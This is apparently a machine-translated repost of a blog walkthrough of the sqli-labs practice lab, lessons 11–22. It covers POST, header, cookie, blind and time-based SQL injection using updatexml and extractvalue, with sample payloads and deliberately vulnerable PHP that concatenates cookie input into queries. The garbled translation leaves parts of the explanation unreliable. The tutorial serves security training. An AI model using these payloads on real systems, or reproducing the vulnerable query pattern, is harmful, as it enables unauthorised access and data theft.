Original article: blog. csdn. netu012764254articledetails51361152 last talked about the basic challenge of less1-10: blog. csdn. netu012764254articledetails51207833, all of which are get-type and contain many types. This time, post-type injection is generally used for login bypass, and of course it is also possible
Http://blog.csdn.net/u012763794/article/details/51361152 the last time I talked about the basic challenge of less1-10: Challenge
Link: http://blog.csdn.net/u012763794/article/details/51361152
The last time I talked about the less1-10 of basic challenges: Challenge.
Some basic knowledge previous basic challenge less1-10http: // knowledge
Tools
Firefox + hackbar plugin
Check the fields to be submitted by post. uname and passwd (right-click the edit box on the Right of username to view the elements)
Less11 POST-Error Based-Single quotes-String (POST-type Single quotes Injection Based on errors)
Method of determination. As mentioned in the previous article, a single quotation mark is used directly to report an error.
We copy the whole quotation mark.
Remove the single quotation marks on the left and right ends and change them to the following
Test 'limit, and test has a single quotation mark on the right. How can this problem be different from the get error? (the single quotation mark of get is an error, and the test is followed by two single quotation marks.
Then the single quotes are injected.
Add a note directly to the permanent real account and log on successfully.
Of course, in addition to comments, you can also close single quotes. When there is a problem to be discussed here, see
Why did login fail? Let's look at the final SQL statement,
First, and has a higher priority than or]
The '1' = '1' and password = 'test' operation is performed first. Because the password field in the users table does not have any data, the value test and the value on the right are false, and the entire expression is false.
For ease of understanding, see the following three figures. The first one is the users table, and the second one is 0 (this is false, and the third is lower)
Since the right side is false
Then the statement becomes SELECT username, password FROM users WHERE username = 'test' or false
Username = 'test' does not have this line of data. The right side is false, or it cannot save you.
So what should we do? uname won't work here. Let's try passwd and find it works.
Let's explain it in the following text. With the above foundation, it should be easier to understand.
First and first
Username = 'test' and password = 'test' return false (0)
'1' = '1' must be true (1)
The final statement is equivalent
SELECT username, password FROM users WHERE 0 or 1;
So we can certainly bypass the login.
To sum up:Generally, comments are used for the First Login Field (generally the user name), and for the second Login Field (usually the password), both closed and commented.
In addition, we can obtain database information through blind injection.
Of course, this is also a step to run.
If you have time to rebuild the python script I used before, you can ignore it here.
Less 12 POST-Error Based-Double quotes-String-with twist (injection Based on incorrect Double quotation mark POST-type deformation)
Double quotation marks are used to check if any single quotation marks are used or if anything else is added.
So here we can see that we use) to enclose the variables, so we can bypass them directly.
Less 13 POST-Double Injection-Single quotes-String-twist (POST Single quotes deformation Double Injection)
It can be seen in single quotes), and is directly permanent and closed
Less 14 POST-Double Injection-Single quotes-String-twist (POST Single quotes deformation Double Injection)
This is the same as the name of the previous lesson, but in fact this is a single double quotation mark, no error, double quotation marks will report an error, this is simpler than the above two
Less 15 POST-Blind-Boolian/time Based-Single quotes (POST-type Blind Injection Based on bool type/time Delay Single quotes)
If you enter single quotation marks, double quotation marks will not report errors. We can only add the permanent false or time delay function to determine the single quotation marks for blind injection.
Blind attention, of course, the programming implementation is good.
Less 16 POST-Blind-Boolian/Time Based-Double quotes (Double quotation marks POST Blind Injection Based on bool type/Time Delay)
For this time, use the time delay. uname = a & passwd = a ") or 1 = 1 #. It is determined that the double quotation marks are deformed.
Test: uname = a & passwd = a ") or if (length (database () = 7,1, sleep (5 ))#
Uname = a & passwd = a ") or if (length (database () = 8, 1, sleep (5 ))#
Less 17 POST-Update Query-Error Based-String (Error-Based Update Query POST injection)
Note: The following injection may accidentally clear the password table of the Database user table.
This should have something to do with xpath injection. For the xpath tutorial, see http://www.w3school.com.cn/xpath/there is also a function updatexml. This function has not been described for a long time. It is directly used to send a payload: updatexml (1, con, (version (), 0). What is the meaning of this function, what is the parameter corresponding to each location? I didn't say anything. I was also drunk, and then I directly helped to get started on the mysql console, it was an official pleasure to learn things. I have explained some examples, which is very good.
We can see that the first parameter is the expression of the target xml, and the second parameter is the expression of the xpath, the third parameter in the w3c xpath tutorial is to replace the content of the xpath expression with the target xml.
After practicing the above example, you will understand
The first one directly replaces the content of node a, including node a, Fff Now
The second is because the first node does not have Node B, so it does not change./is equivalent to the linux root directory.
In the third example, no matter which layer B is located, replace
Besides, only one node can be replaced.
Well, let's get started with injection.
I am not familiar with this. Let's look at the code first.
First, there is a filter function, check_input
Check_input first determines that it is not null, and then truncates the first 15 characters,
When magic_quotes_gpc = On, the get_magic_quotes_gpc () function returns 1.
When magic_quotes_gpc = Off, the get_magic_quotes_gpc () function returns 0.
The magic_quotes_gpc function in php is used to determine the data to be parsed as prompted by the user. For example, the escape character "\" is added to data from post, get, and cookie. to ensure that the data will not cause the program, especially the database statements may cause fatal errors due to pollution caused by special characters. If the escape character is enabled, the escape character will be removed.
Ctype_digit: determines whether it is a number. If it is a number, true is returned. Otherwise, false is returned.
If it is a character, use mysql_real_escape_string to filter it. In fact, it is basically escape (Escape special characters in strings used in SQL statements,
Considering the connected Current Character SetIn this way, the wide-byte cut is a number and the intval is used to convert it into an int, because the bytes type number is passed.
function check_input($value){if(!empty($value)){// truncation (see comments)$value = substr($value,0,15);}// Stripslashes if magic quotes enabledif (get_magic_quotes_gpc()){$value = stripslashes($value);}// Quote if not a numberif (!ctype_digit($value)){$value = "'" . mysql_real_escape_string($value) . "'";}else{$value = intval($value);}return $value;}
We can see that only the uname is filtered, so let's start with the password.
First, query the user name and password through the user name, and then update the password of that user. First, query the user name and password through the user name. We can only guess this, such as admin, root, test or something, we can use the dictionary here to know that it is admin, and directly use admin to consider the next step.
Let's take a look at payload. The first and third parameters of updatexml can be any number.
In fact, it is okay not to use 1 =. What we want is to report an error when executing updatexml.
The key lies in the understanding of the second parameter. Why? We can see that the version information of the second parameter is incomplete, we add a left and right parentheses on both sides of the version (The hexadecimal system is 0x28, 0x29). We can see that we add a + (0x2b) on both sides when there are more parentheses on the right) check it out. We can see that it is completely displayed.
Of course, you can add another one.
Even the preceding connection is acceptable.
There are still many other characters that will not be listed through the experiment. When an error is reported, only the following part will be displayed. However, if we add the first character, the entire character will be displayed, what is the error output function of xpath?
Let's start the real injection process.
Obtain the current database
User
The data table uses limit to control the first few tables. Only one row of data can be generated at a time. If there are multiple rows, the information cannot be exposed, single quotes are not filtered. security is also supported with single quotes.
Check the columns in the users table.
Id, username, and password
Next we will get the data and find that we cannot select some values in the same table first, and then update the table (in the same statement)
We can't do this by adding a select line. We also need to give an alias to the layer inside.
So let's start with an hack name. Just add it after the entire select statement. It's very difficult.
Less 18 POST-Header Injection-Uagent field-Error based (based on the Error user agent, Header POST Injection)
Here, the user name and password are filtered.
How can we determine whether there is a uagent header injection? It is because he has obtained our ip address and guessed that he has also obtained the uagent? Of course, we don't rely on plain text. This depends on Fuzzy testing (in fact, it depends on single quotes and other applications to test the returned results). Please visit the xxx browser to obtain the uagent, but it may only be processed by front-end js.
So what tools are used for manual attention? burp's repeater is very convenient. Some Firefox plug-ins should also be supported, such as live http headers and tamper data. Below I will use the live http headers plug-in.
First, you must enter the correct account and password to bypass the account and password to determine and enter the uagent processing section. This section is more suitable for registration and login and re-injection, here, we enter the correct account and password to output our uagent.
Obtain the database as in the previous section.
We will not get the users table this time. Get the emails table and change the limit offset to get all
Less 19 POST-Header Injection-Referer field-Error based (Header-based Referer POST Error Injection)
Of course, you can use updatexml here.
Here is another error function extractvalue.
For more details, see here. The first parameter is also xml, and the second parameter is the xpath expression. This function is used to obtain the value of a node in xml.
Taking a look at the example, we can see that unlike updatexml, only one node can be updated at a time. extractvalue can obtain the values of multiple nodes at a time and separate them with spaces.
Next, let's start the injection (Here we only need two parameters for the extractvalue function, and three updatexml parameters)
In fact, the idea is similar.
The final result is displayed here.
Less 20 POST-Cookie injections-Uagent field-Error based (based on the Error cookie header POST injection) read the code below
First, determine whether there is a cookie. If no, query it and set the cookie.
If a cookie exists, there are two more cases. In the first case, if you log on to the cookie, the cookie is still valid. If you do not press the delete cookie button, the cookie will output various information, including the delete cookie button
if(!isset($_POST['submit'])){$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600;echo "
";echo '
';echo '';echo "
";echo '
';echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "
";echo '';echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];echo "
";echo '';echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE
";echo '';echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);echo "
";$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";$result=mysql_query($sql);if (!$result){die('Issue with your mysql: ' . mysql_error());}$row = mysql_fetch_array($result);if($row){ echo ''; echo 'Your Login name:'. $row['username']; echo "
";echo ''; echo 'Your Password:' .$row['password']; echo "";echo "
";echo 'Your ID:' .$row['id'];}else{echo "
";echo '
';echo '';echo "
";//echo '';}echo '
';echo '';echo '
';}
In the second case, you press the delete cookie button.
The backend sets the cookie time to the expiration time, And the cookie is deleted.
The core code is
First, the method and everything are generic.
The three columns are returned correctly, so the users table has three columns.
Directly obtain the last email information.
Less 21 Cookie Injection-Error Based-complex-string (Error-Based complex Response Cookie Injection)
Here is base64, single quotes + parentheses, which is actually similar to 20.
Less 22 Cookie Injection-Error Based-Double Quotes-string (Based on the incorrect Double quotation mark character Cookie Injection) This is similar to less20, 21. Here it is Double quotation marks and base64 encoded, what are the fears of a powerful hackbar,
Link: http://blog.csdn.net/u012763794/article/details/51361152